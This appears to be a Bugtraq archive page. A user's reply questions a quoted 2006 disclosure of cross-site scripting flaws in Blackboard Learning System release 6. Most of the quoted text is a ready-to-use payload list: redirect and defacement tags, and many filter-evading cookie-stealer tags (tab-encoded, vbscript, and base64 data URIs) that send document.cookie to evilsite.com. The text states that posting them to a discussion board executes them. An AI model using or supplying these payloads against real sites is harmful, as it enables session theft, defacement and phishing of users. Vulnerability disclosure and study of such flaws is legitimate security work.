Bugtraq mailing list archives
Re: BlackBoard Multiple Vulnerabilities (XSS)
From: "C. Hamby" <fixer () gci net>
Date: Tue, 22 Aug 2006 16:57:40 -0800
What type of an account do you have to have and in what sections can this be exploited? Also, has Blackboard verified this in their current release (7.1)? -cdh Pr070n () gmail com wrote:
----------------------------------------------------------------------------------------- Found by: PrOtOn & digi7al64 Date: May 20th 2006 Critical Level: High Type: Multiple Cross Site Scripting (XSS) vunerabilities ------------------------------------------------------------------------------------------ Software: Blackboard Learning System (Release 6) Blackboard Learning and Community Portal Suite (Release6)-6.2.3.23 ------------------------------------------------------------------------------------------ Explanation: You can inject HTML, VB code and or Javascript into specific tags to steal cookies, deface the site using frame busters or even redirect to external sites for phishing purposes. If you have limited access, then a simple post into the Discussion Board using the right tags with the right code (provided below) will execute the vulnerability(ies). ------------------------------------------------------------------------------------------- About: Blackboards parsing system only checks for the string "javascript", Thus vbscript code can be injected at will into tags as well as any versions of javascript that uses uncommon syntax (ie tabs encoding etc) ------------------------------------------------------------------------------------------- Vulnerabilities: Defacement (FrameBuster) ------------------------- <meta http-equiv="refresh" content="15;url= http://evilsite.com"> Defacement (FrameBuster) ------------------------- <iframe src=" http://evilsite.com" width=100 height=100></iframe> Defacement (IE ONLY) ------------------------- <img src=vbscript:document.write("defaced_by_insane_script_kiddies")> Defacement (IE ONLY) ------------------------- <link rel="stylesheet" href=vbscript:document.write("defaced_by_insane_script_kiddies")> <img src=vb script:document.write("defaced_by_insane_script_kiddies")> Cookie Stealer (IE ONLY) ------------------------- <img src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/> <img src="vbscript:window.focus ()"style=visibility:hidden/> <img src="vbscript: window.close()"style=visibility:hidden/> Cookie Stealer (IE ONLY) ------------------------- <link rel="stylesheet" href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)"> Cookie Stealer (Encoded Tab - IE ONLY) ------------------------- <img src="jav	ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> Cookie Stealer (html encoded - IE ONLY) ------------------------- <img src='javascripdocument.images[1].s rc=" http://evilsite.com"+document.cookie;'<img src="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> Cookie Stealer (tabs - IE ONLY) ------------------------- <img src="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> Cookie Stealer (body tag with tabs - IE ONLY) ------------------------- <body background="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"> Cookie Stealer (div tag with tabs - IE ONLY) ------------------------- <div style="background-image: url(jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)"> Cookie Stealer (firefox) ------------------------- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4="> Cookie Stealer (firefox - click to work) ------------------------- <a href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a> --------------------------------------------------------------------------------------------- Disclaimer: Myself or any other person involved with this discovery will not be responsible for what you do with this information. Blackboard developers have been contacted by me and a patch has been released according to them. ----------------------------------------------------------------------------------------------- Shout Outs: r0xes, criticalsecurity(dot)net, Infowar(dot)com ------------------------------------------------------------------------------------------------ Contact: Pr070n(at)gmail(dot)com Digi7al64(at)gmail(dot)com -------------------------------------------------------------------------------------------------
Current thread:
- BlackBoard Multiple Vulnerabilities (XSS) Pr070n (Aug 22)
- Re: BlackBoard Multiple Vulnerabilities (XSS) C. Hamby (Aug 23)
- <Possible follow-ups>
- Re: BlackBoard Multiple Vulnerabilities (XSS) pr0t0n (Aug 23)
- Re: Re: BlackBoard Multiple Vulnerabilities (XSS) Pr070n (Aug 31)